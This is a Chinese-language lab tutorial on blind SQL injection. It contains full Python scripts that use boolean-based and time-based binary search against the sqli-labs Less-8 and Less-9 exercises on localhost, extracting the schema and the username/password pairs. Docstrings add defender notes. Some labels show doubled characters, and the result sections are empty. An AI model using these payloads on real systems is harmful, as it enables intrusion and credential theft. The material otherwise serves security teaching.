一、布爾盲注
布爾盲注(Boolean-based Blind SQL Injection)是一種SQL注入技術,用于在應用程序不直接顯示數據庫查詢結果的情況下,通過構造特定的SQL查詢並根據頁面返回的不同結果來推測數據庫中的信息。這種方法依賴于SQL查詢的結果是否為真或假,進而推斷出數據庫中的具體信息。
案例為sqlilabs中的第八關,采用二分查找
python腳本:
import requests
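def get_database(URL):
    """Recover the current database name one character at a time.

    For character position ``i`` the request asks the server whether
    ``ascii(char) <= mid``; the only observable difference is whether the
    page still contains the string "You are in" (condition true) or not
    (condition false). That true/false oracle drives a binary search over
    printable ASCII (32..127), so each character costs about seven requests.

    Args:
        URL: the sqli-labs Less-8 endpoint; the probe is sent in the ``id``
            GET parameter.

    Returns:
        None. The recovered name is printed.

    Defender's note: the oracle exists because ``id`` is concatenated into
    the SQL text. A parameterised query removes it completely; returning the
    same page regardless of query outcome removes the content difference
    this script keys on.
    """
    s = ""
    for i in range(1, 10):  # at most 9 characters are recovered
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            # greatest(x, mid) == mid  <=>  x <= mid, i.e. the probe is true
            # when character i is <= mid
            payload = {"id": f"1' and greatest(ascii(substr(database(),{i},1)),{mid})={mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                high = mid  # character is <= mid: search the lower half
                mid = (low + high) // 2
            else:
                low = mid + 1  # character is > mid: search the upper half
                mid = (low + high) // 2
        s += chr(mid)  # loop exits with low == high == mid
    print("數(shù)據(jù)庫名稱:" + s)


def get_table(URL):
    """Recover the comma-joined table names of schema ``security``.

    Same page-content oracle as :func:`get_database`, but the probe is
    ``ascii(char) > mid``, so a "You are in" hit moves the search upward.
    Always walks 31 positions; the result is not trimmed.

    Args:
        URL: the sqli-labs Less-8 endpoint.

    Returns:
        None. The recovered string is printed.
    """
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1  # character is > mid
                mid = (low + high) // 2
            else:
                high = mid  # character is <= mid
                mid = (low + high) // 2
        s += chr(mid)
    print("表的名稱:" + s)


def get_column(URL):
    """Recover the comma-joined column names of ``security.users``.

    Identical search to :func:`get_table`, with the sub-select pointed at
    ``information_schema.columns``.

    Args:
        URL: the sqli-labs Less-8 endpoint.

    Returns:
        None. The recovered string is printed.
    """
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表的列:" + s)


def get_result(URl):
    """Recover ``username>password`` pairs (0x3e is '>') from ``users``.

    Identical search to :func:`get_table`. The parameter is spelled ``URl``
    in the original and is kept for compatibility; it is now actually used
    (the original read the module-level ``URL`` instead, which only worked
    when run as a script).

    Args:
        URl: the sqli-labs Less-8 endpoint.

    Returns:
        None. The recovered string is printed.
    """
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid} -- "}
            res = requests.get(url=URl, params=payload)
            if "You are in" in res.text:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表具體數(shù)據(jù):" + s)


if __name__ == '__main__':
    URL = "http://127.0.0.1/sqlilabs/Less-8/index.php"
    get_database(URL)
    get_table(URL)
    get_column(URL)
    get_result(URL)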
運行結果
二、時間盲注
時間盲注(Time-based Blind SQL Injection)是一種SQL注入技術,用于在應用程序沒有直接回顯數據庫查詢結果的情況下,通過構造特定的SQL查詢來推測數據庫中的信息。這種方法依賴于數據庫處理查詢時產生的延遲響應來判斷條件的真假。
案例為sqlilabs中的第九關,同樣為二分查找
python腳本
import requests
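import datetime


def get_database(URL):
    """Recover the current database name using a timing oracle.

    Less-9 returns the same page for true and false conditions, so the probe
    wraps the comparison in ``if(cond, sleep(3), 1)``: a response that takes
    at least three seconds means the condition held. The search over
    printable ASCII (32..127) is the same binary search as in the
    boolean-based script.

    Args:
        URL: the sqli-labs Less-9 endpoint; the probe is sent in the ``id``
            GET parameter.

    Returns:
        None. The recovered name is printed.

    Defender's note: the delay is observable only because ``id`` is
    concatenated into the SQL text; a parameterised query removes the
    injection point. On the monitoring side, bursts of near-identical
    requests each taking a multi-second server time are a distinctive
    signal for this technique.
    """
    s = ""
    for i in range(1, 10):  # at most 9 characters are recovered
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            # greatest(x, mid) == mid  <=>  x <= mid; true branch sleeps 3s
            payload = {"id": f"1' and if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            # timedelta.seconds is the whole-seconds component (days ignored)
            if (end - start).seconds >= 3:
                high = mid  # condition true: character is <= mid
                mid = (low + high) // 2
            else:
                low = mid + 1  # condition false: character is > mid
                mid = (low + high) // 2
        s += chr(mid)  # loop exits with low == high == mid
    print("數(shù)據(jù)庫名稱:" + s)


def get_table(URL):
    """Recover the comma-joined table names of schema ``security``.

    Same timing oracle as :func:`get_database`, but the probe is
    ``ascii(char) > mid``, so a slow response moves the search upward.
    Always walks 31 positions; the result is not trimmed.

    Args:
        URL: the sqli-labs Less-9 endpoint.

    Returns:
        None. The recovered string is printed.
    """
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1  # character is > mid
                mid = (low + high) // 2
            else:
                high = mid  # character is <= mid
                mid = (low + high) // 2
        s += chr(mid)
    print("表的名稱:" + s)


def get_column(URL):
    """Recover the comma-joined column names of ``security.users``.

    Identical search to :func:`get_table`, with the sub-select pointed at
    ``information_schema.columns``.

    Args:
        URL: the sqli-labs Less-9 endpoint.

    Returns:
        None. The recovered string is printed.
    """
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表的列:" + s)


def get_result(URl):
    """Recover ``username>password`` pairs (0x3e is '>') from ``users``.

    Identical search to :func:`get_table`. The parameter is spelled ``URl``
    in the original and is kept for compatibility; it is now actually used
    (the original read the module-level ``URL`` instead, which only worked
    when run as a script).

    Args:
        URl: the sqli-labs Less-9 endpoint.

    Returns:
        None. The recovered string is printed.
    """
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            requests.get(url=URl, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users中的具體數(shù)據(jù):" + s)


if __name__ == '__main__':
    URL = "http://127.0.0.1/sqlilabs/Less-9/index.php"
    # only get_table was run for the result shown below; the others are
    # left commented out as in the original script
    # get_database(URL)
    get_table(URL)
    # get_column(URL)
    # get_result(URL)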
運行結果: